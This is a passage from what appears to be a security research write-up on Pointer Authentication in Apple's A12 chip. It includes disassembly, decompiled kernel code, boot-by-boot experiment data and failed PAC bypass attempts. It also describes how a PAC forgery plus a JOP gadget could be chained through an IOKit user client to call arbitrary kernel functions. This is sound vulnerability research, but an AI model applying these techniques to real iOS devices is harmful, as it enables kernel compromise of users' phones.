    if !IsZero(ptr<top_bit:bottom_PAC_bit>) && !IsOnes(ptr<top_bit:bottom_PAC_bit>) then
        PAC<top_bit-1> = NOT(PAC<top_bit-1>);
    // Preserve the determination between upper and lower address at bit<55>
    // and insert PAC
    if tbi then
        result = ptr<63:56>:selbit:PAC<54:bottom_PAC_bit>:ptr<bottom_PAC_bit-1:0>;
    else
        result = PAC<63:56>:selbit:PAC<54:bottom_PAC_bit>:ptr<bottom_PAC_bit-1:0>;
    return result;

Operationally, there are no significant differences between executing PACIA at EL0 and EL1, which means that if Apple has used the same PAC keys for both exception levels, we can simply execute PACIA in userspace to sign kernel pointers.
Of course, it seems highly unlikely that Apple has left such an obvious hole in their implementation. Even so, the symmetry between EL0 and EL1 means that we could potentially forge kernel PACIA signatures by reading the kernel's PAC keys and replacing the userspace PAC keys for one thread in our process with the kernel PAC keys; then we could indeed forge kernel pointers by executing PACIA in userspace in that thread. This would be useful if Apple is using an unknown algorithm in place of QARMA, since we could reuse the existing signing machinery without having to reverse engineer it.

Cross-key PAC forgeries

Another symmetry that we could potentially leverage to produce PAC forgeries is between the different PAC keys: PACIA, PACIB, PACDA, and PACDB all reduce to the same implementation under the hood, just using different keys. Thus, if we can replace one PAC key with another, we can turn signing gadgets for one key into signing gadgets for another key. This would be useful if, for example, the PAC algorithm is unknown and there is something that prevents us from setting the userspace PAC keys equal to the kernel PAC keys so that we can perform cross-EL forgeries. While this forgery strategy is much less powerful, since we'd need to rely on the existence of PAC signing gadgets (which are a known limitation of PAC), this technique would free us from the restriction that the signing gadget use the same key that we're trying to forge, potentially diversifying the set of available gadgets.

Finding an entry point for kernel code execution

Now that we have some theoretical ideas of how we might try and defeat PAC on A12 devices, let's look at the other end and figure out how we could use a PAC bypass to execute arbitrary code in the kernel. The traditional way to get kernel code execution via read/write is the iokit_user_client_trap() strategy described by Stefan Esser in Tales from iOS 6 Exploitation.
This strategy involves patching the vtable of an IOUserClient instance so that calling the userspace function IOConnectTrap6(), which invokes iokit_user_client_trap() in the kernel, will call an arbitrary function with up to 7 arguments. To see why this works, here's the implementation of iokit_user_client_trap() from XNU 4903.221.2:

kern_return_t
iokit_user_client_trap(struct iokit_user_client_trap_args *args)
{
    kern_return_t result = kIOReturnBadArgument;
    IOUserClient *userClient;
    if ((userClient = OSDynamicCast(IOUserClient,
            iokit_lookup_connect_ref_current_task((mach_port_name_t)
            (uintptr_t)args->userClientRef)))) {
        IOExternalTrap *trap;
        IOService *target = NULL;
        trap = userClient->getTargetAndTrapForIndex(&target, args->index);
        if (trap && target) {
            IOTrap func;
            func = trap->func;
            if (func) {
                result = (target->*func)(args->p1, args->p2, args->p3,
                                         args->p4, args->p5, args->p6);
            }
        }
        iokit_remove_connect_reference(userClient);
    }
    return result;
}

If we can patch the IOUserClient instance such that getTargetAndTrapForIndex() returns controlled values for trap and target, then the invocation of target->func will call an arbitrary kernel function with up to 7 controlled arguments (target plus p1 through p6). To see how this strategy would work on A12 devices, let's examine the changes to this function introduced by PAC. This is easiest to understand by looking at the disassembly:

iokit_user_client_trap
    PACIBSP
    ... ;; Call iokit_lookup_connect_ref_current_task() on
    ... ;; args->userClientRef and cast the result to IOUserClient.
loc_FFFFFFF00808FF00
    STR XZR, [SP,#0x30+var_28]   ;; target = NULL
    LDR X8, [X19]                ;; x19 = userClient, x8 = ->vtable
    AUTDZA X8                    ;; validate vtable's PAC
    ADD X9, X8, #0x5C0           ;; x9 = pointer to vmethod in vtable
    LDR X8, [X8,#0x5C0]          ;; x8 = vmethod getTargetAndTrapForIndex
    MOVK X9, #0x2BCB,LSL#48      ;; x9 = 2BCB`vmethod_pointer
    LDR W2, [X20,#8]             ;; w2 = args->index
    ADD X1, SP, #0x30+var_28     ;; x1 = &target
    MOV X0, X19                  ;; x0 = userClient
    BLRAA X8, X9                 ;; PAC call ->getTargetAndTrapForIndex
    LDR X9, [SP,#0x30+var_28]    ;; x9 = target
    CMP X0, #0
    CCMP X9, #0, #4, NE
    B.EQ loc_FFFFFFF00808FF84    ;; if !trap || !target
    LDP X8, X11, [X0,#8]         ;; x8 = trap->func, x11 = func virtual?
    AND X10, X11, #1
    ORR X12, X10, X8
    CBZ X12, loc_FFFFFFF00808FF84 ;; if !func
    ADD X0, X9, X11,ASR#1        ;; x0 = target
    CBNZ X10, loc_FFFFFFF00808FF58
    MOV X9, #0                   ;; Use context 0 for non-virtual func
    B loc_FFFFFFF00808FF70
loc_FFFFFFF00808FF58
    ... ;; Handle the case where trap->func is a virtual method.
loc_FFFFFFF00808FF70
    LDP X1, X2, [X20,#0x10]      ;; x1 = args->p1, x2 = args->p2
    LDP X3, X4, [X20,#0x20]      ;; x3 = args->p3, x4 = args->p4
    LDP X5, X6, [X20,#0x30]      ;; x5 = args->p5, x6 = args->p6
    BLRAA X8, X9                 ;; PAC call func(target, p1, ..., p6)
    MOV X21, X0
loc_FFFFFFF00808FF84
    ... ;; Call iokit_remove_connect_reference().
loc_FFFFFFF00808FF8C
    ... ;; Epilogue.
    RETAB

As you can see, there are several places where PACs are authenticated. The first, which was omitted from the assembly for brevity, happens when performing the dynamic cast to IOUserClient. Then userClient's vtable is validated and a PAC-protected call to getTargetAndTrapForIndex() is made. After that, the trap->func field is read without validation, and finally the value func is validated with context 0 and called. This is actually about the best case we could reasonably hope for as attackers.
If we can find a legitimate user client that provides an implementation of getTargetAndTrapForIndex() that returns a pointer to an IOExternalTrap residing in writable memory, then all we have to do is replace trap->func with a PACIZA'd function pointer (that is, a pointer signed under APIAKey with context 0). That means only a partial PAC bypass, such as the ability to forge just PACIZA pointers, would be sufficient. A quick search through the kernelcache revealed a unique IOUserClient class, IOAudio2DeviceUserClient, that fit these criteria. Here's a decompilation of its getTargetAndTrapForIndex() method:

IOExternalTrap *IOAudio2DeviceUserClient::getTargetAndTrapForIndex(
        IOAudio2DeviceUserClient *this, IOService **target, unsigned int index)
{
    ...
    *target = (IOService *)this;
    return &this->IOAudio2DeviceUserClient.traps[index];
}

The traps field is initialized in the method IOAudio2DeviceUserClient::initializeExternalTrapTable() to a heap-allocated IOExternalTrap object:

this->IOAudio2DeviceUserClient.trap_count = 1;
this->IOAudio2DeviceUserClient.traps = IOMalloc(sizeof(IOExternalTrap));

Thus, all we need to do to call an arbitrary kernel function is create our own IOAudio2DeviceUserClient connection, forge a PACIZA pointer to the function we want to call, overwrite the userClient->traps[0].func field with the PACIZA'd pointer, and invoke IOConnectTrap6() from userspace. This will give us control of all arguments except X0, which is explicitly set to this by IOAudio2DeviceUserClient's implementation of getTargetAndTrapForIndex(). To gain control of X0 alongside X1 through X6, we'll need to replace IOAudio2DeviceUserClient's implementation of getTargetAndTrapForIndex() in the vtable. This means that, in addition to forging the PACIZA pointer to the function we want to call, we'll also need to create a fake vtable consisting of PACIA'd pointers to the virtual methods, and we'll need to replace the existing vtable pointer with a PACDZA'd pointer to the fake vtable.
This requires a significantly broader PAC forgery capability. However, even if we only manage to produce PACIZA forgeries, there's still a way to gain control of X0: JOP gadgets. A quick search through the kernelcache revealed the following gadget that sets X0:

MOV X0, X4
BR X5

This gives us a way to call arbitrary kernel functions with 4 fully controlled arguments using just a single forged pointer: use iokit_user_client_trap() to call a PACIZA'd pointer to this gadget with X1 through X3 set how we want them for the function call, X4 set to our desired value for X0, and X5 set to the target function we want to call.

Analyzing PAC on the A12

Now that we know how we can use PAC forgery to call arbitrary kernel functions, let's begin analyzing Apple's implementation of PAC on the A12 SoC for weaknesses. Ideally we'll find a way to perform both PACIA and PACDA forgeries, but as previously discussed, even the ability to forge a single PACIZA pointer will be sufficient to call arbitrary kernel functions with up to 4 arguments. To actually perform my analysis, I used the voucher_swap exploit to get kernel read/write on an iPhone XR running iOS 12.1.1 build 16C50.

Finding where PAC keys are set

My first step was to identify where in the kernel's code the PAC keys were being set. Unfortunately, IDA does not display names for the special registers used to store the PAC keys, so I had to do a bit of digging. Searching for "APIAKey" in the LLVM repository mirror on GitHub revealed that the registers used to store the APIAKey are called APIAKeyLo_EL1 and APIAKeyHi_EL1, and the registers for other keys are similarly named. Furthermore, the file AArch64SystemOperands.td declares the codes for these registers. This allows us to easily search for these registers in IDA. For example, to find where APIAKeyLo_EL1 is set, I searched for the string "#0, c2, c1, #0".
This brought me to what I identified as part of common_start, from osfmk/arm64/start.s: _WriteStatusReg(TCR_EL1, sysreg_restore); // 3, 0, 2, 0, 2 PPLTEXT__set__TTBR0_EL1(x25 & 0xFFFFFFFFFFFF); _WriteStatusReg(TTBR1_EL1, (x25 + 0x4000) & 0xFFFFFFFFFFFF); // 3, 0, 2, 0, 1 _WriteStatusReg(MAIR_EL1, 0x44F00BB44FF); // 3, 0, 10, 2, 0 if ( x21 ) _WriteStatusReg(TTBR1_EL1, cpu_ttep); // 3, 0, 2, 0, 1 _WriteStatusReg(VBAR_EL1, ExceptionVectorsBase + x22 - x23); // 3, 0, 12, 0, 0 do x0 = _ReadStatusReg(S3_4_C15_C0_4); // ???? while ( !(x0 & 2) ); _WriteStatusReg(S3_4_C15_C0_4, x0 | 5); // ???? __isb(0xF); _WriteStatusReg(APIBKeyLo_EL1, 0xFEEDFACEFEEDFACF); // 3, 0, 2, 1, 2 _WriteStatusReg(APIBKeyHi_EL1, 0xFEEDFACEFEEDFACF); // 3, 0, 2, 1, 3 _WriteStatusReg(APDBKeyLo_EL1, 0xFEEDFACEFEEDFAD0); // 3, 0, 2, 2, 2 _WriteStatusReg(APDBKeyHi_EL1, 0xFEEDFACEFEEDFAD0); // 3, 0, 2, 2, 3 _WriteStatusReg(S3_4_C15_C1_0, 0xFEEDFACEFEEDFAD1); // ???? _WriteStatusReg(S3_4_C15_C1_1, 0xFEEDFACEFEEDFAD1); // ???? _WriteStatusReg(APIAKeyLo_EL1, 0xFEEDFACEFEEDFAD2); // 3, 0, 2, 1, 0 _WriteStatusReg(APIAKeyHi_EL1, 0xFEEDFACEFEEDFAD2); // 3, 0, 2, 1, 1 _WriteStatusReg(APDAKeyLo_EL1, 0xFEEDFACEFEEDFAD3); // 3, 0, 2, 2, 0 _WriteStatusReg(APDAKeyHi_EL1, 0xFEEDFACEFEEDFAD3); // 3, 0, 2, 2, 1 _WriteStatusReg(APGAKeyLo_EL1, 0xFEEDFACEFEEDFAD4); // 3, 0, 2, 3, 0 _WriteStatusReg(APGAKeyHi_EL1, 0xFEEDFACEFEEDFAD4); // 3, 0, 2, 3, 1 _WriteStatusReg(SCTLR_EL1, 0xFC54793D); // 3, 0, 1, 0, 0 __isb(0xF); _WriteStatusReg(CPACR_EL1, 0x300000); // 3, 0, 1, 0, 2 _WriteStatusReg(TPIDR_EL1, 0); // 3, 0, 13, 0, 4 This is very interesting, since it looks like common_start sets the PAC keys to constant values every time a core starts up! 
Thinking that perhaps this was an artifact of the decompilation, I checked the disassembly:

common_start+A8
LDR X0, =0xFEEDFACEFEEDFACF ;; x0 = pac_key
MSR #0, c2, c1, #2, X0 ;; APIBKeyLo_EL1
MSR #0, c2, c1, #3, X0 ;; APIBKeyHi_EL1
ADD X0, X0, #1
MSR #0, c2, c2, #2, X0 ;; APDBKeyLo_EL1
MSR #0, c2, c2, #3, X0 ;; APDBKeyHi_EL1
ADD X0, X0, #1
MSR #4, c15, c1, #0, X0 ;; ????
MSR #4, c15, c1, #1, X0 ;; ????
ADD X0, X0, #1
MSR #0, c2, c1, #0, X0 ;; APIAKeyLo_EL1
MSR #0, c2, c1, #1, X0 ;; APIAKeyHi_EL1
ADD X0, X0, #1
MSR #0, c2, c2, #0, X0 ;; APDAKeyLo_EL1
MSR #0, c2, c2, #1, X0 ;; APDAKeyHi_EL1
...
pac_key DCQ 0xFEEDFACEFEEDFACF ; DATA XREF: common_start+A8↑r

No, common_start really was initializing all the PAC keys to constant values. This was quite surprising: clearly Apple knows that using constant PAC keys breaks all of PAC's security guarantees. So I figured there must be some other place the PAC keys were being initialized to their true runtime values. But after much searching, this appeared to be the only location in the kernelcache that was setting the A keys and the general key. Still, it did appear that the B keys were being set in a few more places:

machine_load_context+A8
LDR X1, [X0,#0x458]
...
MSR #0, c2, c1, #2, X1 ;; APIBKeyLo_EL1
MSR #0, c2, c1, #3, X1 ;; APIBKeyHi_EL1
ADD X1, X1, #1
MSR #0, c2, c2, #2, X1 ;; APDBKeyLo_EL1
MSR #0, c2, c2, #3, X1 ;; APDBKeyHi_EL1

Call_continuation+10
LDR X5, [X4,#0x458]
...
MSR #0, c2, c1, #2, X5 ;; APIBKeyLo_EL1
MSR #0, c2, c1, #3, X5 ;; APIBKeyHi_EL1
ADD X5, X5, #1
MSR #0, c2, c2, #2, X5 ;; APDBKeyLo_EL1
MSR #0, c2, c2, #3, X5 ;; APDBKeyHi_EL1

Switch_context+11C
LDR X3, [X2,#0x458]
...
MSR #0, c2, c1, #2, X3 ;; APIBKeyLo_EL1
MSR #0, c2, c1, #3, X3 ;; APIBKeyHi_EL1
ADD X3, X3, #1
MSR #0, c2, c2, #2, X3 ;; APDBKeyLo_EL1
MSR #0, c2, c2, #3, X3 ;; APDBKeyHi_EL1

Idle_load_context+88
LDR X1, [X0,#0x458]
...
MSR #0, c2, c1, #2, X1 ;; APIBKeyLo_EL1 MSR #0, c2, c1, #3, X1 ;; APIBKeyHi_EL1 ADD X1, X1, #1 MSR #0, c2, c2, #2, X1 ;; APDBKeyLo_EL1 MSR #0, c2, c2, #3, X1 ;; APDBKeyHi_EL1 These are the only other places in the kernel that set PAC keys, and they all follow the same pattern: a 64-bit load from offset 0x458 into some data structure (later identified as struct thread), then setting the APIBKey to that value concatenated with itself, and setting the APDBKey to that value plus one concatenated with itself. Furthermore, all of these locations deal specifically with context switching between threads; conspicuously absent from this list is any indication that the PAC keys are changed when transitioning between exception levels, either on kernel entry (e.g. via a syscall) or on kernel exit (via ERET*). This would be a strong indication that the PAC keys are indeed shared between userspace and the kernel. (I subsequently learned that @ProteasWang discovered the same thing I did: a GitHub gist called pac-set-key.md lists only the previously mentioned locations.) If my understanding was correct, this seemed to suggest three disturbing and, frankly, highly unlikely things. First, contrary to all rules of cryptography, it appeared that the kernel was using constant values for the A keys and the general key. Second, the keys seemed to be effectively 64-bits, since the first and second halves of the 128-bit key are the same. And third, the PAC keys appeared to be shared between userspace and the kernel, meaning userspace could forge kernel PAC signatures. Could Apple's implementation really be that broken? Or was something else going on? Observing runtime behavior In order to find out, I conducted a simple experiment: I read the value of a global PACIZA'd function pointer in the __DATA_CONST.__const section over many different boots, recording the value of the kASLR slide each time. 
Since the number of possible kernel slide values is relatively small, it shouldn't be too long before I get two separate boots with the kernel at the exact same location in memory, meaning that the original, non-PAC'd value of the pointer would be the same both times. Then, if the A keys really are constant, the value of the PACIZA'd pointer should be the same in both boots, since the signing algorithm is deterministic and the pointer and context values being signed are the same both times. As a target, I chose to read sysclk_ops.c_gettime, which is a pointer to the function rtclock_gettime(). The results of this experiment over 30 trials are listed below, with colliding runs highlighted: slide = 000000000ce00000, c_gettime = b2902c70147f2050 slide = 0000000023200000, c_gettime = 61e2c2f02abf2050 slide = 0000000023000000, c_gettime = d98e57f02a9f2050 slide = 0000000006e00000, c_gettime = 0b9613700e7f2050 slide = 000000001ce00000, c_gettime = c3822bf0247f2050 slide = 0000000004600000, c_gettime = 00d248f00bff2050 slide = 000000001fe00000, c_gettime = 6aa61ef0277f2050 slide = 0000000013400000, c_gettime = fda847701adf2050 slide = 0000000015a00000, c_gettime = c5883b701d3f2050 slide = 000000000a200000, c_gettime = bbe37ef011bf2050 slide = 0000000014200000, c_gettime = a8ff9f701bbf2050 slide = 0000000014800000, c_gettime = 20e538701c1f2050 slide = 0000000019800000, c_gettime = 66f61b70211f2050 slide = 000000001c200000, c_gettime = 24aea37023bf2050 slide = 0000000006c00000, c_gettime = 5a9b42f00e5f2050 slide = 000000000e200000, c_gettime = 128526f015bf2050 slide = 000000001fa00000, c_gettime = 4cf2ad70273f2050 slide = 000000000a200000, c_gettime = 6ed3177011bf2050 slide = 000000000ea00000, c_gettime = 869d0f70163f2050 slide = 0000000015800000, c_gettime = 9898c2f01d1f2050 slide = 000000001d400000, c_gettime = 52a343f024df2050 slide = 000000001d600000, c_gettime = 7ea2337024ff2050 slide = 0000000023e00000, c_gettime = 31d3b3f02b7f2050 slide = 0000000008e00000, c_gettime 
= 27a72cf0107f2050 slide = 000000000fa00000, c_gettime = 2b988f70173f2050 slide = 0000000011000000, c_gettime = 86c7a670189f2050 slide = 0000000011a00000, c_gettime = 3d8103f0193f2050 slide = 000000001c200000, c_gettime = 56d444f023bf2050 slide = 000000001fe00000, c_gettime = 82fa3970277f2050 slide = 0000000008c00000, c_gettime = 89dcda70105f2050 As you can see, even though by all accounts the IA key is the same, PACIZAs for the same pointer generated across different boots are somehow different. The most straightforward solution I could think of was that iBoot or the kernel might be overwriting pac_key with a random value each boot before common_start runs, so that the PAC keys really are different each boot. Even though pac_key resides in __TEXT_EXEC.__text, which is protected against writes by KTRR, it's still possible to modify __TEXT_EXEC.__text before KTRR lockdown is performed. However, reading pac_key at runtime showed it still contained the value 0xfeedfacefeedfacf, so something else must be going on. I next performed an experiment to determine whether the PAC keys really were shared between userspace and the kernel, as the code suggested. I executed the PACIZA instruction in userspace on the address of the rtclock_gettime() function, and then compared against the PACIZA'd sysclk_ops.c_gettime pointer read from kernel memory. These two values differed despite the fact that the PAC keys should be the same in userspace and the kernel, so once again it appeared that the A12 was conjuring some sort of dark magic. Still not quite believing that pac_key wasn't being modified at runtime, I tried enumerating the B-key values of all threads on the system to see whether they really matched the 0xfeedfacefeedfacf value suggested by the code. Looking at the code for Switch_context in osfmk/arm64/cswitch.s, I determined that the value used as a seed to compute the B keys was being loaded from offset 0x458 of struct thread, the Mach struct representing a thread. 
This field is not present in the public XNU sources, so I decided to name it pac_key_seed. My experiment consisted of walking the global thread list and dumping each thread's pac_key_seed. I found that all kernel threads were indeed using the 0xfeedfacefeedfacf PAC key seed, while threads for userspace processes were using different, random seeds: pid 0 thread ffffffe00092c000 pac_seed feedfacefeedfacf pid 0 thread ffffffe00092c550 pac_seed feedfacefeedfacf pid 0 thread ffffffe00092caa0 pac_seed feedfacefeedfacf ... pid 258 thread ffffffe003597520 pac_seed 51c6b449d9c6e7a3 pid 258 thread ffffffe003764aa0 pac_seed 51c6b449d9c6e7a3 Thus, it did seem like the PAC keys for kernel threads were being initialized the same each boot, and yet the PAC'd pointers were different across boots. Something fishy was going on. Bypass attempts I next turned my attention to bypassing PAC using the weaknesses identified in the section "Weaknesses against kernel attackers". Since executing the same PACIZA instruction on the same pointer value with the same PAC keys across different boots was producing different results, there must be some unidentified source of per-boot randomness. This basically spelled doom for the "implement QARMA-64 in userspace and compute PACs manually" strategy, but I decided to try it anyway. Unsurprisingly, this did not work. Next I looked at whether I could set my own thread's PAC keys equal to the kernel PAC keys and forge kernel pointers in userspace. Ideally this would mean I'd set my IA key equal to the kernel's IA key, namely 0xfeedfacefeedfad2. However, as previously discussed, there's only one place in the kernel that appears to set the A keys, common_start, and yet userspace and kernel PAC codes are different anyway. So I decided to combine this approach with the PAC cross-key symmetry weakness and instead set my thread's IB key equal to the kernel's IA key, which should allow me to forge kernel PACIZA pointers by executing PACIZB in userspace. 
Unfortunately, the naive way of doing this, by overwriting the pac_key_seed field in the current thread, would probably crash or panic the system, since changing PAC keys during a thread's lifetime will break the thread's existing PAC signatures. And PAC signatures are checked all the time, most frequently when returning from a function via RETAB. This means that the only way to guarantee that changing a thread's PAC keys doesn't crash it or trigger a panic is to ensure that the thread does not call or return from any functions while the keys have been changed. The easiest way to do this is to spawn a thread that infinite loops in userspace executing PACIZB and storing the result to a global variable. Then we can overwrite the thread's pac_key_seed and force the thread off-core using contention; once the looping thread is rescheduled, its B keys will be set via Switch_context and the forgery will be executed. However, once again, the result of this experiment was unsuccessful: gettime = fffffff0161f2050 kPACIZA = faef2270161f2050 uPACIZA = 138a8670161f2050 uPACIZB forge = d7fd0ff0161f2050 It seemed that the A12 manages to break either cross-EL PAC symmetry or cross-key PAC symmetry. To gain a bit more insight, I devised a test specifically for cross-key PAC symmetry. This meant setting my thread's IB key equal to the DB key and checking whether the outputs of PACIZB and PACDZB looked similar, indicating that the same PAC was generated. Since the IB and DB keys are generated from the same seed and cannot be set independently, this actually involved 2 trials: first with seed value 0x11223344, and next with seed value 0x11223345: IB = 0x11223344 uPACIZB = 0028180100000000 DB = 0x11223345 uPACDZB = 00679e0100000000 IB = 0x11223345 uPACIZB = 003ea80100000000 DB = 0x11223346 uPACDZB = 0023c58100000000 The highlighted rows show the result of executing PACDZB and PACIZB on the same value from userspace with the same keys. 
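To make this concrete, we can XOR the two results produced under the same key (the PACDZB result from the first trial and the PACIZB result from the second, both using key value 0x11223345) and count how many bits differ. A quick Python sketch:

```python
# PACDZB and PACIZB results on the same pointer under the same key
# (0x11223345): if cross-key symmetry held, the two PACs should match.
pacdzb = 0x00679E0100000000
pacizb = 0x003EA80100000000

diff = pacdzb ^ pacizb
differing_bits = bin(diff).count("1")
print(hex(diff), differing_bits)
```

Roughly half of the PAC bits populated in these samples disagree, which is what we'd expect from two completely unrelated PACs rather than from a single PAC with a bit or two of slack.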
On a standard ARMv8.3 implementation of Pointer Authentication, we'd expect most of the bits of the PAC to agree. However, the two PACs seem unrelated, suggesting that the A12 does indeed manage to break cross-key PAC symmetry. Implementation theories With all three weaknesses suggested by the original design demonstrably not applicable to the A12, it was time to try and work out what was really going on here. It's clear that Apple had considered the fact that Pointer Authentication as defined in the standard would do little to protect against kernel attackers with read/write, and thus they decided to implement a more robust defense. It's impossible to know what exactly they did without a concerted reverse engineering effort, but we can speculate based on the observed behavior. My first thought was that Apple had decided to implement a secure monitor again, like it had done on prior devices with Watchtower to protect against kernel patches. If the secure monitor could trap transitions between exception levels and trap writes to the PAC key registers, it could hide the true PAC keys from the kernel and implement other shenanigans to break PAC symmetries. However, I couldn't find evidence of a secure monitor inside the kernelcache. Another alternative is that Apple has decided to move the true PAC keys into the A12 itself, so that even the most powerful software attacker doesn't have the ability to read the keys. The keys could be generated randomly on boot or set via special registers by iBoot. Then, the keys that are fed to QARMA-64 (or whatever algorithm is actually being used to generate PACs) would be some combination of the random key, the standard key set via special registers, and the current exception level. For example, the A12 could theoretically store 10 random 128-bit PAC keys, one for each pair of an exception level (EL0 or EL1) and a standard PAC key (IA, IB, DA, DB, or GA). 
Then the PAC key used for any particular operation could be the XOR of the random PAC key corresponding to the operation (e.g. IB-EL0 for a PACIB instruction in userspace) with the standard PAC key set via the standard registers (e.g. APIBKey). Such a design wouldn't come without challenges (for example, you'd need a non-volatile place to store the random keys for when the core sleeps), but it would cleanly break the cross-EL and cross-key symmetries and prevent the keys from ever being disclosed, completely mitigating the three previously identified weaknesses. While I couldn't figure out the true implementation, I decided to assume the most robust design for the rest of my research: that the true keys are random and stored in the SoC itself. That way, any bypass strategy I found would be all but guaranteed to work regardless of the actual implementation. PAC EL-impersonation With zero leads for systematic weaknesses, I decided it was time to investigate PAC signing gadgets. The very first PACIA instruction occurs in a function I identified as vm_shared_region_slide_page(), and specifically as an inlined copy of vm_shared_region_slide_page_v3(). 
This function is present in the XNU sources, and has the following interesting comment in its main loop: uint8_t* rebaseLocation = page_content; uint64_t delta = page_entry; do { rebaseLocation += delta; uint64_t value; memcpy(&value, rebaseLocation, sizeof(value)); delta = ( (value & 0x3FF8000000000000) >> 51) * sizeof(uint64_t); // A pointer is one of : // { // uint64_t pointerValue : 51; // uint64_t offsetToNextPointer : 11; // uint64_t isBind : 1 = 0; // uint64_t authenticated : 1 = 0; // } // { // uint32_t offsetFromSharedCacheBase; // uint16_t diversityData; // uint16_t hasAddressDiversity : 1; // uint16_t hasDKey : 1; // uint16_t hasBKey : 1; // uint16_t offsetToNextPointer : 11; // uint16_t isBind : 1; // uint16_t authenticated : 1 = 1; // } bool isBind = (value & (1ULL << 62)) == 1; if (isBind) { return KERN_FAILURE; } bool isAuthenticated = (value & (1ULL << 63)) != 0; if (isAuthenticated) { // The new value for a rebase is the low 32-bits of the threaded value // plus the slide. value = (value & 0xFFFFFFFF) + slide_amount; // Add in the offset from the mach_header const uint64_t value_add = s_info->value_add; value += value_add; } else { // The new value for a rebase is the low 51-bits of the threaded value // plus the slide. Regular pointer which needs to fit in 51-bits of // value. C++ RTTI uses the top bit, so we'll allow the whole top-byte // and the bottom 43-bits to be fit in to 51-bits. ... } memcpy(rebaseLocation, &value, sizeof(value)); } while (delta != 0); The part about the "pointer" containing authenticated, hasBKey, and hasDKey bits suggests that this code is dealing with authenticated pointers, although all the code that actually performs PAC operations has been removed from the public sources. Furthermore, the other comment about C++ RTTI suggests that this code is specifically for rebasing userspace code. This means that the kernel would have to be aware of, and maybe perform PAC operations on, userspace pointers. 
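The pointer layout described in this comment is easy to decode with a few shifts and masks. Here's a minimal Python sketch of the non-bind cases (the field offsets come from the comment and the IDA decompilation below; the function and field names are mine, and the key-selector mapping follows the decompilation's switch):

```python
def parse_threaded_pointer(value):
    """Decode one on-disk pointer in the threaded-rebase format."""
    info = {
        "delta": ((value & 0x3FF8000000000000) >> 51) * 8,  # bytes to next pointer
        "is_bind": bool(value & (1 << 62)),
        "is_auth": bool(value & (1 << 63)),
    }
    if info["is_auth"]:
        info["target"] = value & 0xFFFFFFFF         # offsetFromSharedCacheBase
        info["diversity"] = (value >> 32) & 0xFFFF  # diversityData
        info["addr_div"] = bool(value & (1 << 48))  # hasAddressDiversity
        info["key"] = (value >> 49) & 3             # per the decompilation:
                                                    # 0=IA, 1=IB, 2=DA, 3=DB
    return info

# An authenticated pointer signed with the DA key, two 8-byte slots
# before the next entry in the chain:
p = parse_threaded_pointer((1 << 63) | (2 << 49) | (2 << 51) | 0x41414141)
```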
Looking at the decompilation of this loop in IDA, we can see that there are many operations not present in the public source code:

slide_amount = si->slide;
offset = uservaddr - rebaseLocation;
do
{
    rebaseLocation += delta;
    value = *(uint64_t *)rebaseLocation;
    delta = (value >> 48) & 0x3FF8;
    if ( value & 0x8000000000000000 )       // isAuthenticated
    {
        value = slide_amount + (uint32_t)value + slide_info_entry->value_add;
        context = (value >> 32) & 0xFFFF;   // diversityData
        if ( value & 0x1000000000000 )      // hasAddressDiversity
            context = (offset + rebaseLocation) & 0xFFFFFFFFFFFF | (context << 48);
        if ( si->UNKNOWN_FIELD && !(BootArgs->bootFlags & 0x4000000000000000) )
        {
            daif = _ReadStatusReg(ARM64_SYSREG(3, 3, 4, 2, 1)); // DAIF
            if ( !(daif & 0x80) )
                __asm { MSR #6, #3 }
            _WriteStatusReg(S3_4_C15_C0_4, _ReadStatusReg(S3_4_C15_C0_4) & 0xFFFFFFFFFFFFFFFB);
            __isb(0xFu);
            key_bits = (value >> 49) & 3;
            switch ( key_bits )
            {
                case 0:
                    value = ptrauth_sign...(value, ptrauth_key_asia, &context);
                    break;
                case 1:
                    value = ptrauth_sign...(value, ptrauth_key_asib, &context);
                    break;
                case 2:
                    value = ptrauth_sign...(value, ptrauth_key_asda, &context);
                    break;
                case 3:
                    value = ptrauth_sign...(value, ptrauth_key_asdb, &context);
                    break;
            }
            _WriteStatusReg(S3_4_C15_C0_4, _ReadStatusReg(S3_4_C15_C0_4) | 4);
            __isb(0xFu);
            ml_set_interrupts_enabled(~(daif >> 7) & 1);
        }
    }
    else
    {
        ...
    }
    memmove(rebaseLocation, &value, 8);
}
while ( delta );

It appears that the kernel is attempting to sign pointers on behalf of userspace. This is interesting because, as previously discussed, the A12 breaks cross-EL symmetry, which should mean that the kernel's signatures on userspace pointers will be invalid in userspace. It's unlikely that this freshly-introduced code is broken, so there must be some mechanism by which the kernel instructs the CPU to sign using the userspace keys instead.
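One detail worth pulling out of this loop is the modifier (context) computation: the 16-bit diversityData acts as the context on its own, unless hasAddressDiversity is set, in which case it's combined with the low 48 bits of the pointer's user virtual address (offset + rebaseLocation above). A small Python sketch of just that logic (the 0xABCD diversity value is an arbitrary example):

```python
def rebase_context(value, user_vaddr):
    """Mirror the context computation from the decompiled rebase loop;
    user_vaddr is the pointer's address in the userspace mapping."""
    context = (value >> 32) & 0xFFFF           # diversityData
    if value & (1 << 48):                      # hasAddressDiversity
        context = (user_vaddr & 0xFFFFFFFFFFFF) | (context << 48)
    return context

v = (1 << 63) | (1 << 48) | (0xABCD << 32)
ctx = rebase_context(v, 0x1F0000C000)
```

Note the shape of the address-diversified case: a 16-bit discriminator in the top bits and the 48-bit address in the bottom. The same layout shows up again in kernel-side signing, such as the 0x14EF context used around sysctl_unregister_oid().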
Searching for other instances of PAC* instructions like this, a pattern begins to emerge: whenever the kernel signs pointers on behalf of userspace, it wraps the PAC instructions by clearing and setting a bit in the S3_4_C15_C0_4 system register: MRS X8, #4, c15, c0, #4 ; S3_4_C15_C0_4 AND X8, X8, #0xFFFFFFFFFFFFFFFB MSR #4, c15, c0, #4, X8 ; S3_4_C15_C0_4 ISB ... ;; PAC stuff for userspace MRS X8, #4, c15, c0, #4 ; S3_4_C15_C0_4 ORR X8, X8, #4 MSR #4, c15, c0, #4, X8 ; S3_4_C15_C0_4 ISB Also, kernel code that sets/clears bit 0x4 of S3_4_C15_C0_4 is usually accompanied by code that disables interrupts and checks bit 0x4000000000000000 of BootArgs->bootFlags, as we see in the excerpt from vm_shared_region_slide_page_v3() above. We can infer that bit 0x4 of S3_4_C15_C0_4 controls whether PAC* instructions in the kernel use the EL0 keys or the EL1 keys: when this bit is set the kernel keys are used, otherwise the userspace keys are used. It makes sense that you'd need to disable interrupts while this bit is cleared, since otherwise the arrival of an interrupt may cause other kernel code to execute while the EL0 PAC keys are still in use, causing PAC validation failures that would panic the kernel. PAC-enable bits in SCTLR_EL1 Another thing I noticed while investigating system registers was that previously reserved bits of SCTLR_EL1 were now being used to enable/disable PAC instructions for certain keys. 
